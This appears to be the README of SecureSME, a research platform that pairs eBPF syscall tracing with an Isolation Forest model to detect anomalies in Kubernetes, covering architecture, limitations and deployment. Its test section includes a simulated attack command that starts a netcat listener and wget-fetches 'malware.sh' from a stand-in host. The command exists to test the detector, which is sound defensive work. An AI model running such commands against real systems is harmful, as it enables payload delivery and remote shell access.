SecureSME is an experimental runtime security framework designed to evaluate the feasibility of combining kernel-level eBPF telemetry with unsupervised machine learning for detecting anomalous behavior in Kubernetes environments.
The project explores a core research question:
Can high-fidelity syscall telemetry collected at Ring 0 be transformed into practical, low-overhead anomaly detection for cloud-native workloads?
Rather than competing with production tools such as Falco, SecureSME is engineered as a systems research platform that bridges:
- Kernel-level observability (eBPF)
- Kubernetes runtime security
- DevSecOps deployment practices
- Unsupervised anomaly detection (Isolation Forest)
The goal is to evaluate detection efficacy, system overhead, and architectural trade-offs in a realistic containerized environment.
Privileged agent hooking sys_execve to detect "Living off the Land" attacks in real-time.
Asynchronous processing of heavy log files using Redis & Celery worker nodes.
SecureSME utilizes a hybrid detection strategy, combining asynchronous log parsing (User Space) for legacy forensic analysis with AI-driven system call tracing (Kernel Space) for zero-day threat prevention.
graph TD
%% Legacy Log Pipeline
subgraph UserSpace ["Reactive Sensor (User Space)"]
User["Forensic Analyst"] -->|"Upload auth.log"| API["Flask API Gateway"]
API -->|"Queue Task"| Redis["Redis Message Broker"]
Redis -->|"Pop Task"| Worker["Celery Worker Node"]
Worker -->|"Regex Threat Parsing"| DB[("PostgreSQL")]
end
%% Modern eBPF Pipeline
subgraph KernelSpace ["Proactive Sensor (Kernel Space)"]
Attacker["Attacker (Compromised Pod)"] -->|"Runs malware"| Syscall["sys_execve (Ring 0)"]
Syscall -->|"Intercept"| BPF["eBPF Probe"]
BPF -->|"Perf Buffer"| Agent["Python Security Agent"]
Agent -->|"Feature Extraction"| ML["Isolation Forest (AI)"]
ML -->|"-1 (Anomaly Detected)"| API
end
%% Frontend
DB -->|"Fetch Telemetry"| UI["React PWA Dashboard"]
-
Kernel Observability (eBPF): A privileged Docker container running an eBPF probe that hooks into the Linux kernel to gain immutable, Ring-0 visibility across all Kubernetes namespaces, bypassing container isolation boundaries.
-
Edge AI Anomaly Detection: Replaces rigid regex rules with an Unsupervised Machine Learning model (Isolation Forest) deployed at the edge to mathematically detect zero-day reverse shells and droppers without static signatures.
-
Automated Threat Intelligence: Parses unstructured server logs (syslog, auth.log) to identify high-severity incidents like SSH brute force and Root access attempts.
-
Adversarial Validation: Architecture successfully red-teamed against simulated container-escape and living-off-the-land (LotL) attack chains.
-
DevSecOps Pipeline: Integrated Bandit (SAST) and Safety dependency scanning into GitHub Actions to block vulnerable code.
- No high-throughput syscall benchmarking yet.
- No quantified latency delta under load.
- Future Work:
- Measure CPU overhead at varying exec rates.
- Profile memory footprint under stress.
- Publish baseline vs instrumented comparison tables.
- Current ML features are primarily lexical and event-based.
- Lacks:
- Process lineage modeling
- Temporal burst detection
- Container-level statistical baselining
- Future Work:
- Introduce parent-child graph modeling.
- Implement rolling window anomaly scoring.
- Evaluate sequential behavioral models.
- Currently built using BCC.
- Migration to libbpf + CO-RE planned to reduce runtime dependencies and improve portability.
- Tested in controlled Kubernetes environment.
- Future Work:
- Multi-node stress simulation.
- Failure mode and recovery testing.
- Kernel Observability: eBPF (BCC Library), C, Python
- Machine Learning: Scikit-Learn, Pandas, Joblib
- Core Backend: Python 3.12, Flask, SQLAlchemy
- Async Infrastructure: Celery, Redis
- Frontend: React, TailwindCSS
- Database: PostgreSQL
- DevOps: Docker, Docker Compose, GitHub Actions
-
Clone the repository
git clone https://github.com/Murashidzi/SecureSME-Platform.git cd SecureSME-Platform -
Deployment Option A: Local Docker Compose (Note: The eBPF agent requires host kernel headers and privileged execution)
sudo docker-compose up -d --build sudo docker exec securesme_api python init_db.py -
Deployment Option B: Kubernetes (DaemonSet) Deploy the sensor across a K8s cluster mapping host-level kernel debug directories.
kubectl create namespace security-ops kubectl apply -f infra/k8s/ebpf/daemonset.yaml
- Test A: The Reactive Engine (Log Analysis)
- Trigger a forensic log upload via the API:
curl -X POST -F "file=@heavy_attack.log" http://localhost:5000/api/upload - Verify asynchronous background processing::
sudo docker logs -f securesme_worker
Test B: The Proactive Engine (AI Kernel Probe): Simulate an attacker inside an isolated container executing a malicious payload:
- Monitor the Flask API ingestion:
sudo docker logs -f securesme_api
- Launch the attack from a new terminal:
sudo docker run --rm alpine sh -c "apk add --no-cache netcat-openbsd && nc -lvp 4444 & wget [http://example.com/malware.sh](http://example.com/malware.sh)"
This platform is v0 of an ongoing research programme. The architectural lessons learned here (specifically the limitations of BCC overhead under load and the inability of tabular Isolation Forest models to detect sequence-level attack patterns) directly informed the design of the successor system. The successor implements libbpf + CO-RE for portable kernel instrumentation, a concurrent Go daemon using the cilium/ebpf library for zero-drop event processing, and an LSTM sequence model trained on syscall streams to detect temporal anomalies that frequency-based models miss. See: sentinel-ebpf (in development).